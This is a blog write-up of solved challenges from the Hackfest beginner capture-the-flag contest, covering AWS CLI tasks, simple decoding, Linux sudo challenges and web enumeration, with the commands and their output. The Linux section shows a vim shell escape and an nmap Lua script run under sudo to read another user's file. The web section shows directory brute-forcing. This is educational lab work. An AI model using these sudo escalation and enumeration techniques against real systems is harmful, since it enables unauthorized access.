This year’s Hackfest, nicknamed “Ressurection”, was the 14th edition of the conference. It was a great opportunity (for me at least) to reconnect with old colleagues I had not seen since 2020 and to meet new poeple.

This post is a partial writeup of the challenges I’ve had the time to solve as part of the Beginner CTF.

Due to time and logistic constraints, I opted to participate only in the Beginner CTF. It was available over the conference wifi network and did not require much preparation. Overall, it was a good refresher. The challenges that I’ve looked at were well made, kudos to the authors.

Here is how the organizers describe this CTF:

Beginner: A good place to start! Take on dozens of challenges created specifically for learning. Are you stuck on a challenge? Contact the creator of the challenge for an explanation and he will be happy to guide you!

AWS Track

This track was interesting because it explores some of the AWS CLI areas that I have personally never used.

Warning: The AWS access keys and tokens have been replaced with placeholders.

01 - AWS whoami (5 pts)

Challenge description:

In AWS, a user needs to generate an access key and a secret key to interact with the AWS API. Can you find out to whom this set of credentials belongs to?

  • Access key: ${AWS_ACCESS_KEY_1}
  • Secret key: ${AWS_SECRET_ACCESS_1}

Note: The us-east-1 AWS region is to be used for all challenges in this category.

How to solve:

$ export AWS_ACCESS_KEY_ID="${AWS_ACCESS_KEY_1}"
$ export AWS_SECRET_ACCESS_KEY="${AWS_SECRET_ACCESS_1}"
$ export AWS_DEFAULT_REGION="us-east-1"
$ aws sts get-caller-identity
{
    "UserId": "AIDASECYGINVY654B7UBL",
    "Account": "012345678901",
    "Arn": "arn:aws:iam::012345678901:user/${HF_FLAG_1}"
}

The flag is in the ARN: ${HF_FLAG_1}

References:

02 - AWS cat mysecrets.txt (6 pts)

Challenge description:

In AWS, Secrets Manager can act as a sort of password manager for your applications, and access to those secrets can be logged and restricted. Using the credentials given in the AWS whoami challenge, can you recover the flag stored it the following secrets manager’s secret?

hf-aws-beginner-challenge2-secret

How to solve:

$ # The environment variables set for the whoami challenge are still set
$ aws secretsmanager get-secret-value --secret-id hf-aws-beginner-challenge2-secret
{
    "ARN": "arn:aws:secretsmanager:us-east-1:012345678901:​secret:hf-aws-beginner-challenge2-secret-1ZcN0L",
    "Name": "hf-aws-beginner-challenge2-secret",
    "VersionId": "88694825-9080-49ad-a01f-c22cc08f79ab",
    "SecretString": "${HF_FLAG_2}",
    "VersionStages": [
        "AWSCURRENT"
    ],
    "CreatedDate": 1666218640.248
}

The flag is in the secret string: ${HF_FLAG_2}

References:

03 - AWS ls and cp (7 pts)

Challenge description:

AWS S3 (Simple Storage Service) can be used to store files in a bucket like in a regular file system’s folder. Using the credentials given in the AWS whoami challenge, can you recover the flag from the following bucket?

hf-aws-beginner-challenge3-bucket-012345678901

How to solve:

$ # The environment variables set for the whoami challenge are still set
$ aws s3  ls s3://hf-aws-beginner-challenge3-bucket-012345678901
2022-10-19 18:32:13         36 flag.txt
aws s3 cp s3://hf-aws-beginner-challenge3-bucket-012345678901/flag.txt .
download: s3://hf-aws-beginner-challenge3-bucket-012345678901/flag.txt to ./flag.txt
$ cat flag.txt 
${HF_FLAG_3}

The flag was in the flag.txt file: ${HF_FLAG_3}

04 - AWS mongodump (8 pts)

Challenge description:

AWS DynamoDB provides a fast key/value store similar to a MongoDB collection. Using the credentials given in the AWS whoami challenge, can you recover the flag from the following table?

hf-aws-beginner-challenge4-table

How to solve:

$ # The environment variables set for the whoami challenge are still set
$ aws dynamodb scan --table-name hf-aws-beginner-challenge4-table
{
    "Items": [
        {
            "flag": {
                "S": "${HF_FLAG_4}"
            }
        }
    ],
    "Count": 1,
    "ScannedCount": 1,
    "ConsumedCapacity": null
}

The flag was returned in the flag object: ${HF_FLAG_4}

References:

05 - AWS sudo (9 pts)

Challenge description:

In AWS, you can assume different roles to interact with the AWS API as another resource. For example, you could assume the role of a Lambda function you created to troubleshoot its permissions. Using the credentials given in the AWS whoami challenge, can you assume the role arn:aws:iam::012345678901:role/hf-aws-beginner-challenge5-role and run the following command?

aws ssm get-parameter --name hf-aws-beginner-challenge5-parameter

$ # The environment variables set for the whoami challenge are still set
$ aws sts assume-role \
--role-arn "arn:aws:iam::012345678901:role/hf-aws-beginner-challenge5-role" \
--role-session-name AWSCLI-Session
{
    "Credentials": {
        "AccessKeyId": "${AWS_ACCESS_KEY_2}",
        "SecretAccessKey": "${AWS_SECRET_ACCESS_2}",
        "SessionToken": "${AWS_STS_TOKEN_1}",
        "Expiration": "2022-10-29T19:29:26Z"
    },
    "AssumedRoleUser": {
        "AssumedRoleId": "AROASECYGINV2VM2REZ34:AWSCLI-Session",
        "Arn": "arn:aws:sts::012345678901:assumed-role/hf-aws-beginner-challenge5-role/AWSCLI-Session"
    }
}

$ AWS_ACCESS_KEY_ID="${AWS_ACCESS_KEY_2}" \
AWS_SECRET_ACCESS_KEY="${AWS_SECRET_ACCESS_2}" \
AWS_SESSION_TOKEN="${AWS_STS_TOKEN_1}" \
aws ssm get-parameter --name hf-aws-beginner-challenge5-parameter
{
    "Parameter": {
        "Name": "hf-aws-beginner-challenge5-parameter",
        "Type": "String",
        "Value": "${HF_FLAG_5}",
        "Version": 1,
        "LastModifiedDate": 1666218640.537,
        "ARN": "arn:aws:ssm:us-east-1:012345678901:parameter/hf-aws-beginner-challenge5-parameter",
        "DataType": "text"
    }
}

The flag was in the Value of the returned Parameter object: ${HF_FLAG_5}

References:

06 - AWS curl (10)

Challenge description:

In AWS, the access to some publicly accessible resources (such as an S3 Bucket or an API Gateway) can be restricted using a signature mechanism. This signature can be generated using a set of AWS credentials and a library such as Python’s AWSRequestsAuth. Some tools, such as Postman, even integrate this signature mechanism in their supported authentication methods. Using the credentials given in the AWS whoami challenge, can you recover the flag the following URL?

This challenge took me a while to figure since I never had the opportunity to play with signed requests. I had to search on the Internet to find something that would suite.

How to solve:

  1. Make a virtualenv and install the aws-requests-auth package:
    $ python3 -m venv venv
    $ source venv/bin/activate
    $ pip install aws-requests-auth
    
  2. Create a small python script (solve_challenge_06.py) with the content:
    import boto3
    import requests
    from aws_requests_auth.aws_auth import AWSRequestsAuth
    from urllib.parse import urlparse
    
    url = os.getenv('HF_CHALLENGE_URL')
    aws_service = 'execute-api'
    
    auth = AWSRequestsAuth(
        aws_access_key=os.getenv('AWS_ACCESS_KEY_ID'),
        aws_secret_access_key=os.getenv('AWS_SECRET_ACCESS_KEY'),
        aws_region=os.getenv('AWS_DEFAULT_REGION'),
        aws_host=urlparse(url).netloc,
        aws_service=aws_service)
    
    response = requests.get(url, auth=auth)
    response.raise_for_status()
    print(response.text)
    
  3. Run the script:
    $ # The environment variables set for the whoami challenge are still set
    $ HF_CHALLENGE_URL="https://1f1xwaoef4.execute-api.us-east-1.amazonaws.com/api/" python3 solve_challenge_06.py
    {"flag":"${HF_FLAG_6}"}
    

The flag was found in the response data: ${HF_FLAG_6}

References:

07 - AWS python3 my_script.py (6 pts)

Challenge description:

AWS Lambda allows to run code without the need to setup any server. It supports various programming languages, such as Node.js, Python, Ruby, Java, Go and .NET Core. Can you execute the following Lambda function?

hf-aws-beginner-challenge7-lambda

How to solve:

$ # The environment variables set for the whoami challenge are still set
$ aws lambda invoke --function-name hf-aws-beginner-challenge7-lambda lambda_exec.log
{
    "StatusCode": 200,
    "ExecutedVersion": "$LATEST"
}
cat lambda_exec.log 
"${HF_FLAG_7}"

The flag was in the lambda function execution logs: ${HF_FLAG_7}

Reference:

08 - AWS docker pull (8 pts)

Challenge description:

AWS ECR (Elastic Container Registry) acts as an AWS managed docker repository to host your container images. Can you pull and run the docker image from the following private ECR repository?

012345678901.dkr.ecr.us-east-1.amazonaws.com/hf-aws-beginner-challenge8-repository

How to solve:

  1. Use the get-login-password ECR command to configure the docker daemon login:
    $ # The environment variables set for the whoami challenge are still set
    $ aws ecr get-login-password | docker login --username AWS --password-stdin 012345678901.dkr.ecr.us-east-1.amazonaws.com 
    WARNING! Your password will be stored unencrypted in /home/dtvezina/.docker/config.json.
    Configure a credential helper to remove this warning. See
    https://docs.docker.com/engine/reference/commandline/login/#credentials-store
    
  2. Pull the container image from the registry:
    $ docker pull 012345678901.dkr.ecr.us-east-1.amazonaws.com/hf-aws-beginner-challenge8-repository
    Using default tag: latest
    latest: Pulling from hf-aws-beginner-challenge8-repository
    213ec9aee27d: Pull complete 
    Digest: sha256:27f39eb1cc2372af477820713ea7604fb0b8a106bcc9f97c5c9c2031c00c137e
    Status: Downloaded newer image for 012345678901.dkr.ecr.us-east-1.amazonaws.com/hf-aws-beginner-challenge8-repository:latest
    012345678901.dkr.ecr.us-east-1.amazonaws.com/hf-aws-beginner-challenge8-repository:latest
    
  3. Check the container images available:
    $ docker image ls
    REPOSITORY                                                                           TAG       IMAGE ID       CREATED      SIZE
    012345678901.dkr.ecr.us-east-1.amazonaws.com/hf-aws-beginner-challenge8-repository   latest    8ebc85c05ed2   9 days ago   5.54MB
    
  4. Run the container image (we are trusting the challenge designers here - obviously do not run untrusted images in the real world)
    $ docker run 8ebc85c05ed2
    ${HF_FLAG_8}
    

The flag was printed in the container’s standard output: ${HF_FLAG_8}

References:

09 - AWS cat /var/log/* (7 pts)

Challenge description:

AWS CloudWatch Logs allows you to centralize logs from pretty much everything, including AWS services, applications logs or AWS API interractions. Log groups contain logs streams, which in turn contain log events. Can you retrieve the events from the following log group?

hf-aws-beginner-challenge9-log-group

How to solve:

  1. Check which log streams are availble with the log group hf-aws-beginner-challenge9-log-group:
    $ # The environment variables set for the whoami challenge are still set
    $ aws logs describe-log-streams --log-group-name hf-aws-beginner-challenge9-log-group
    {
        "logStreams": [
            {
                "logStreamName": "some-log-stream",
                "creationTime": 1666218648086,
                "firstEventTimestamp": 1666218452782,
                "lastEventTimestamp": 1666218452782,
                "lastIngestionTime": 1666218745806,
                "uploadSequenceToken": "49617124642278214119312939883891311975180274722603532770",
                "arn": "arn:aws:logs:us-east-1:012345678901:log-group:hf-aws-beginner-challenge9-log-group:log-stream:some-log-stream",
                "storedBytes": 0
            }
        ]
    }
    
  2. Get the content of the log stream named some-log-stream
    $ aws logs get-log-events --log-group-name hf-aws-beginner-challenge9-log-group --log-stream-name some-log-stream
    {
        "events": [
            {
                "timestamp": 1666218452782,
                "message": "${HF_FLAG_9}",
                "ingestionTime": 1666218745806
            }
        ],
        "nextForwardToken": "f/37157913160581310312750303562572275654679098760710848512/s",
        "nextBackwardToken": "b/37157913160581310312750303562572275654679098760710848512/s"
    }
    

The flag was in the event message: ${HF_FLAG_9}

References:

10 - AWS login (10 pts)

Challenge description:

Cognito Identity Pools can provide temporary AWS credentials for users based on token from several identity providers, such as Cognito, Amazon, Apple, Facebook, Google, Twitter, OpenID, SAML and more. This can allow for complex application flow, such as granting authenticated users of a Web application to directly access files in an S3 bucket. This can also be configured for guest (unauthenticated) users. Can you get guest temporary credentials for the following identity pool (use the same command as the AWS whoami challenge with the credentials you will find to get the flag)?

us-east-1:1d9c2acf-1d03-4f5e-b8a7-559f4d4c0eff

This challenge was also interesting. I had not played with Cognito so this was a learning experience for me.

How to solve:

  1. List the identity ID from the identity pool:
    $ # The environment variables set for the whoami challenge are still set
    $ aws cognito-identity get-id --identity-pool-id us-east-1:1d9c2acf-1d03-4f5e-b8a7-559f4d4c0eff
    {
        "IdentityId": "us-east-1:27887403-1035-4c57-a1a0-2d9d636df012"
    }
    
  2. Get the credentials from the identity ID:
    $ aws cognito-identity get-credentials-for-identity --identity-id "us-east-1:27887403-1035-4c57-a1a0-2d9d636df012"
    {
        "IdentityId": "us-east-1:27887403-1035-4c57-a1a0-2d9d636df012",
        "Credentials": {
            "AccessKeyId": "${AWS_ACCESS_KEY_3}",
            "SecretKey": "${AWS_SECRET_ACCESS_3}",
            "SessionToken": "${AWS_STS_TOKEN_2}",
            "Expiration": 1667080099.0
        }
    }
    
  3. Let’s use STS to check the identity (similar to the whoami challenge):
    $ AWS_ACCESS_KEY_ID="${AWS_ACCESS_KEY_3}" \
    AWS_SECRET_ACCESS_KEY="${AWS_SECRET_ACCESS_3}" \
    AWS_SESSION_TOKEN="${AWS_STS_TOKEN_2}" \
    aws sts get-caller-identity
    {
        "UserId": "AROASECYGINV7KCTU6W4N:CognitoIdentityCredentials",
        "Account": "012345678901",
        "Arn": "arn:aws:sts::012345678901:assumed-role/${HF_FLAG_10}/CognitoIdentityCredentials"
    }
    

The flag was in the ARN: ${HF_FLAG_10}

References:

Cipher Track

This track covers some of the commonly used encoding techniques used in CTFs.

Base64 (2 pts)

Challenge description:

If you see a string that seems encoded, contains only numbers, letters, / and = and might finish with either one or two = (but not all the time) you should try this decoding method. It is also used by pentesters to transfer files over the network and to make sure we are not missing any parts Here is the string : SEYtMGEzMGI3MzBiNDRjNzhmMGMyZDdkMDRiNzQxNWVjOWY=

Base64 is commonly used not just in CTF but in many protocols as a form of encoding.

How to solve:

$ printf 'SEYtMGEzMGI3MzBiNDRjNzhmMGMyZDdkMDRiNzQxNWVjOWY=' | base64 -d; echo ""
${HF_FLAG_11}

The flag is: ${HF_FLAG_11}

References:

Julius (3 pts)

Challenge description:

One of the first used cipher in history.

Challenge:

XV-6v597s1ttqr467v7rv5498qqt1r41899

Juluis refers to the Ceasar cipher which is a substitution cipher commonly used in CTF events.

How to solve:

  1. The easy way is to play around with the ROT13 amount in Cyberchef
  2. When the output starts with HF-, you have the flag (in this case it is 10)

The flag is: ${HF_FLAG_12}

Reference:

Linux Track

The Linux track is a relatively classic CTF sysadmin type of track.

SSH Key (2 pts)

Challenge description:

You are given an SSH key to the kingdom, do you know how to use it?

If you do, use it at beginner-linux.hfctf.ca with the user cerealkiller.

Note: you are rarely given an SSH key during real world penetration tests. However, it’s really good to learn to use it for security.

File: id_ed25519

How to solve:

$ chmod 600 id_ed25519
$ ssh-insecure -i id_ed25519 [email protected]
$ ls .
65  Allo  Allo.txt  Baron  Phil  PhiletPO  SHAWIGANG  flag.txt  flag.txt.save  holla  nancy  nmap  nmap.old  nmap.sh  test.lua  test.nse
$ cat flag.txt
${HF_FLAG_13}

The flag was in the flag.txt file: ${HF_FLAG_13}

Hidden File (3 pts)

Challenge description:

Get a shell as the user cerealkiller with the previous SSH key and look for a hidden file.

Requirement: You need to have done the SSH Challenge first

How to solve:

$ ls -hla
total 5.8M
drwxr-xr-x 11 cerealkiller cerealkiller 4.0K Oct 30 11:50 .
drwxr-xr-x 10 root         root         4.0K Nov 11  2021 ..
-rw-------  1 cerealkiller cerealkiller  242 Nov 20  2021 .Xauthority
-rw-r--r--  1 root         root            0 Jun 14  2019 .bash_history
-rw-r--r--  1 cerealkiller cerealkiller  220 Apr  4  2018 .bash_logout
-rw-r--r--  1 cerealkiller cerealkiller 3.7K Jun 21  2020 .bashrc
drwx------  3 cerealkiller cerealkiller 4.0K Nov 19  2021 .cache
drwx------  4 cerealkiller cerealkiller 4.0K Nov 20  2020 .config
drwx------  4 cerealkiller cerealkiller 4.0K Nov 20  2020 .gnupg
drwxr-xr-x  2 root         root         4.0K Oct 23 16:34 .hidden
-rw-------  1 cerealkiller cerealkiller  269 Oct 30 05:17 .lesshst
drwxrwxr-x  3 cerealkiller cerealkiller 4.0K Nov 20  2021 .local
-rw-r--r--  1 cerealkiller cerealkiller  807 Apr  4  2018 .profile
-rw-------  1 cerealkiller cerealkiller   20 Oct 29 23:48 .python_history
drwx------  2 cerealkiller cerealkiller 4.0K Oct 30 02:13 .ssh
-rw-------  1 cerealkiller cerealkiller  12K Jun 20  2020 .swp
drwxr-xr-x  2 cerealkiller cerealkiller 4.0K Oct 30 04:31 .vim
-rw-------  1 cerealkiller cerealkiller  11K Oct 30 11:50 .viminfo
-rw-rw-r--  1 cerealkiller cerealkiller    0 Oct 30 00:10 65
-rw-rw-r--  1 cerealkiller cerealkiller    0 Oct 30 01:36 Allo
-rw-rw-r--  1 cerealkiller cerealkiller  119 Oct 30 04:55 Allo.txt
drwxrwxr-x  3 cerealkiller cerealkiller 4.0K Oct 30 04:17 Baron
-rw-rw-r--  1 cerealkiller cerealkiller    0 Oct 30 01:36 Phil
-rw-rw-r--  1 cerealkiller cerealkiller    0 Oct 30 01:36 PhiletPO
-rw-rw-r--  1 cerealkiller cerealkiller    0 Oct 30 01:45 SHAWIGANG
----r-----  1 root         cerealkiller   36 Oct 23 16:29 flag.txt
----r-----  1 cerealkiller cerealkiller   71 Oct 30 01:16 flag.txt.save
-rwxr-xr-x  1 cerealkiller cerealkiller 2.9M Oct 29 18:51 holla
drwxrwxr-x  2 cerealkiller cerealkiller 4.0K Oct 30 11:50 nancy
-rw-rw-r--  1 cerealkiller cerealkiller   24 Oct 29 18:50 nmap
-rwxr-xr-x  1 cerealkiller cerealkiller 2.9M Oct 29 23:36 nmap.old
-rwxrwxrwx  1 cerealkiller cerealkiller   38 Oct 30 01:51 nmap.sh
-rw-rw-r--  1 cerealkiller cerealkiller   19 Oct 29 22:23 test.lua
-rwxrwxr-x  1 cerealkiller cerealkiller   22 Oct 30 01:15 test.nse

$ ls .hidden
flag.txt
$ cat .hidden/flag.txt
${HF_FLAG_14}

The flag was in the .hidden/flag.txt file: ${HF_FLAG_14}

Sudo (4 pts)

Challenge description:

The user cerealkiller has some sudo privileges. Learn to use sudo to be able to read the flag in the user “phantom” home directory.

Requirement: You need to have done the SSH Challenge first Recommendation: Read on sudo

How to solve:

$ sudo -l
Matching Defaults entries for cerealkiller on ip-172-31-16-57:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User cerealkiller may run the following commands on ip-172-31-16-57:
    (phantom) NOPASSWD: ALL
    (vimuser) NOPASSWD: /usr/bin/vim
    (nmapuser) NOPASSWD: /usr/bin/nmap
    (pathuser) NOPASSWD: /home/pathuser/pathuser.sh

$ sudo -u phantom ls -hla /home/phantom/
total 32K
drwxr-xr-x  2 phantom phantom 4.0K Oct 30 05:04 .
drwxr-xr-x 10 root    root    4.0K Nov 11  2021 ..
-rw-------  1 phantom phantom   17 Nov 19  2021 .bash_history
-rw-r--r--  1 phantom phantom  220 Apr  4  2018 .bash_logout
-rw-r--r--  1 phantom phantom 3.7K Apr  4  2018 .bashrc
-rw-r--r--  1 phantom phantom  807 Apr  4  2018 .profile
-rw-------  1 phantom phantom  703 Nov 20  2021 .viminfo
-r--------  1 phantom root      36 Oct 23 16:32 flag.txt

$ sudo -u phantom cat /home/phantom/flag.txt 
${HF_FLAG_15}

The flag was in the /home/phantom/flag.txt file: ${HF_FLAG_15}

VIM (5 pts)

Challenge description:

Vim is a popular text editor for Linux, but there are a lot more that you can do with it rather than just editing text. Can you find out what?

You are allowed to run vim as another user, learn what you can do with that.

How to solve:

$ sudo -u vimuser vim
# from inside vim

! ls -hla /home/vimuser
total 72K
drwxr-xr-x  2 vimuser vimuser 4.0K Oct 30 07:40 .
drwxr-xr-x 10 root    root    4.0K Nov 11  2021 ..
-rw-r--r--  1 vimuser vimuser  220 Apr  4  2018 .bash_logout
-rw-r--r--  1 vimuser vimuser 3.7K Apr  4  2018 .bashrc
-rw-------  1 vimuser vimuser  12K Oct 30 02:04 .flag.txt.swn
-rw-------  1 vimuser vimuser  12K Oct 30 07:33 .flag.txt.swo
-rw-------  1 vimuser vimuser  12K Oct 29 22:58 .flag.txt.swp
-rw-r--r--  1 vimuser vimuser  807 Apr  4  2018 .profile
-rw-------  1 vimuser vimuser  12K Oct 30 07:27 .swp
-r--------  1 vimuser root      36 Oct 23 16:36 flag.txt

view /home/vimuser/flag.txt
${HF_FLAG_16}

The flag was in the /home/vimuser/flag.txt file: ${HF_FLAG_16}

Nmap (7 pts)

Challenge description:

On the box, you are allowed to use nmap as another user. What can you do with these new privileges? Are you able to read the secret files from the user’s home directory?

Note: use the SSH key from the first Linux challenge to log into the box.

How to solve:

$ ls -hla /home/nmapuser
total 24K
drwxr-xr-x  2 nmapuser nmapuser 4.0K Oct 23 16:38 .
drwxr-xr-x 10 root     root     4.0K Nov 11  2021 ..
-rw-r--r--  1 nmapuser nmapuser  220 Apr  4  2018 .bash_logout
-rw-r--r--  1 nmapuser nmapuser 3.7K Apr  4  2018 .bashrc
-rw-r--r--  1 nmapuser nmapuser  807 Apr  4  2018 .profile
-r--------  1 nmapuser root       36 Oct 23 16:38 flag.txt

echo 'local f=io.open("/home/nmapuser/flag.txt", "rb"); print(f:read("*a")); io.close(f);' > /tmp/read_file
sudo -u nmapuser nmap --script /tmp/read_file
Starting Nmap 7.60 ( https://nmap.org ) at 2022-10-30 15:25 UTC
NSE: Warning: Loading '/tmp/read_file' -- the recommended file extension is '.nse'.
${HF_FLAG_17}

The flag was in the /home/nmapuser/flag.txt file: ${HF_FLAG_17}

References:

Web Track

The web track had a few interesting challenges.

Crawler (3 pts)

Challenge description:

What page does a crawler check to see where he can and cannot go? It is used to instruct bot likes google which page they can or cannot show on their search engine, it is however a good source of information to find hidden page without bruteforcing. Use the server http://beginner-web.hfctf.ca. The answer is a full flag not just the file name.

How to solve:

$ curl http://beginner-web.hfctf.ca/robots.txt
${HF_FLAG_18}

The flag was in the response: ${HF_FLAG_18}

Find an alternate index. (6 pts)

Challenge description:

Are you able to find a hidden website under the http://beginner-web.hfctf.ca/?

It is important to check the other files under a website that you want to pentest.

Recommended tools: nikto, dirb

How to solve:

  1. Using the wordlists from the Kali container image (in /usr/share/dirb/wordlists/), let’s run gobuster on the web site.
    $ gobuster dir -u http://beginner-web.hfctf.ca/ -w common.txt 
    ===============================================================
    Gobuster v3.2.0-dev
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url:                     http://beginner-web.hfctf.ca/
    [+] Method:                  GET
    [+] Threads:                 10
    [+] Wordlist:                common.txt
    [+] Negative Status codes:   404
    [+] User Agent:              gobuster/3.2.0-dev
    [+] Timeout:                 10s
    ===============================================================
    2022/10/30 11:39:19 Starting gobuster in directory enumeration mode
    ===============================================================
    /.hta                 (Status: 403) [Size: 286]
    /.htaccess            (Status: 403) [Size: 286]
    /.git/HEAD            (Status: 200) [Size: 21]
    /.htpasswd            (Status: 403) [Size: 286]
    /admin                (Status: 301) [Size: 330] [--> http://beginner-web.hfctf.ca/admin/]
    /assets               (Status: 301) [Size: 331] [--> http://beginner-web.hfctf.ca/assets/]
    /index.htm            (Status: 200) [Size: 36]
    /index.html           (Status: 200) [Size: 93]
    /LICENSE              (Status: 200) [Size: 6555]
    /pages                (Status: 301) [Size: 330] [--> http://beginner-web.hfctf.ca/pages/]
    /robots.txt           (Status: 200) [Size: 36]
    /server-status        (Status: 403) [Size: 286]
    Progress: 4603 / 4615 (99.74%)
    ===============================================================
    2022/10/30 11:39:35 Finished
    ===============================================================
    
  2. Make a request on the index.htm page:
    $ curl http://beginner-web.hfctf.ca/index.htm
    ${HF_FLAG_19}
    

The flag was in the response: ${HF_FLAG_19}

Port Scan (3 pts)

Challenge description:

By default, nmap will only scan the top 1000 ports. Can you learn how to fix this? If you find a weird port, you can poke it with nc (netcat).

The wanted port is within the 13XXX.

Address: beginner-web.hfctf.ca

Recommended Tools: nmap, nc (netcat)

How to solve:

  1. Start by scanning the port range to find the mysterious port:
    $ nmap -p 13000-13999 beginner-web.hfctf.ca
    Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-30 11:46 EDT
    Nmap scan report for beginner-web.hfctf.ca (18.234.148.248)
    Host is up (0.031s latency).
    rDNS record for 18.234.148.248: ec2-18-234-148-248.compute-1.amazonaws.com
    Not shown: 999 filtered tcp ports (no-response)
    PORT      STATE SERVICE
    13337/tcp open  unknown
    
    Nmap done: 1 IP address (1 host up) scanned in 4.60 seconds
    
  2. Attempt to query the page with our favourite HTTP client:
    $ curl http://beginner-web.hfctf.ca:13337
    curl: (1) Received HTTP/0.9 when not allowed
    
  3. This is interesting - let’s try again but this time using HTTP 0.9:
    $ curl --http0.9  http://beginner-web.hfctf.ca:13337/
    ${HF_FLAG_20}
    

The flag was in the response: ${HF_FLAG_20}

List Of Challenges

This is the list of all challenges in this Beginner CTF:

├── Beginner - AWS (dax)
│   ├── 01 - AWS whoami (5)
│   ├── 02 - AWS cat mysecrets.txt (6)
│   ├── 03 - AWS ls and cp (7)
│   ├── 04 - AWS mongodump (8)
│   ├── 05 - AWS sudo (9)
│   ├── 06 - AWS curl (10)
│   ├── 07 - AWS python3 my_script.py (6)
│   ├── 08 - AWS docker pull (8)
│   ├── 09 - AWS cat /var/log/* (7)
|   └── 10 - AWS login (10)
├── Beginner - Cipher (dax)
│   ├── 1 - Write your own decryption algorithm.  (8)
|   └── 2 - Homemade bruteforce (10)
├── Beginner - Cipher (Viper)
│   ├── Base64 (2)
|   └── Julius (3)
├── Beginner - Hash (Viper)
│   ├── LM (5)
│   ├── MD5 (5)
│   ├── NTLM (5)
|   └── SHA1 (6)
├── Beginner - Linux (Viper)
│   ├── Hidden File (3)
│   ├── Nmap (7)
│   ├── SSH Key (2)
│   ├── Sudo (4)
|   └── VIM (5)
├── Beginner - Reverse Engineering (dax)
│   ├── 1 - Bypassing the Password is One Way to do it. (7)
│   ├── 2 - The Real Password is Actually a Flag.  (8)
|   └── A totally legit spreadsheet.  (8)
├── Beginner - SQL (dax)
│   ├── 1 - The Most Basic Form of Injection.  (3)
│   ├── 2 - Get the root user.  (4)
│   ├── 3 - There is Another User...  (5)
|   └── 4 - What About a Random ID?  (6)
├── Beginner - Steganography (dax)
│   ├── 1 - Encrypted (5)
│   ├── 2 - An Image is Worth a Thousand Words.  (5)
|   └── 3 - Things Aren't Always What They Seem.  (5)
├── Beginner - Trivia (Viper)
│   ├── Movie (2)
│   ├── Personality (2)
|   └── Ports (2)
├── Beginner - Web (Viper)
│   ├── Crawler (3)
│   ├── Find an alternate index. (6)
|   └── Port Scan (3)
├── Beginner - Windows (Viper and h3xit)
│   ├── 01 - New Employees ( Start Here ) (2)
│   ├── Domain Admin (25)
│   ├── Domo Arigato.. (5)
│   ├── IIS Application Pool Password (15)
│   ├── Private Share (10)
│   ├── Public User Share (10)
│   ├── Some fields are not meant for secrets! (8)
│   ├── Welcome Password (5)
|   └── Workstation Admin (15)
├── Beginner - Windows (Viper)
│   ├── GPP (5)
│   ├── Hashdump10 (5)
│   ├── Hashdump7 (3)
|   └── Mimikatz (5)
└── Beginner - World of Phenix (@PhenixCorp)
    ├── 1 - Lazy Tiger 🐯 (10)
    ├── 2 - Concatenation Encoding ⚠️ (15)
    ├── 4 - Vigenère what ? ☣️ (35)
    └── 5 - Simple Phenix Ransomware 🔪 (45)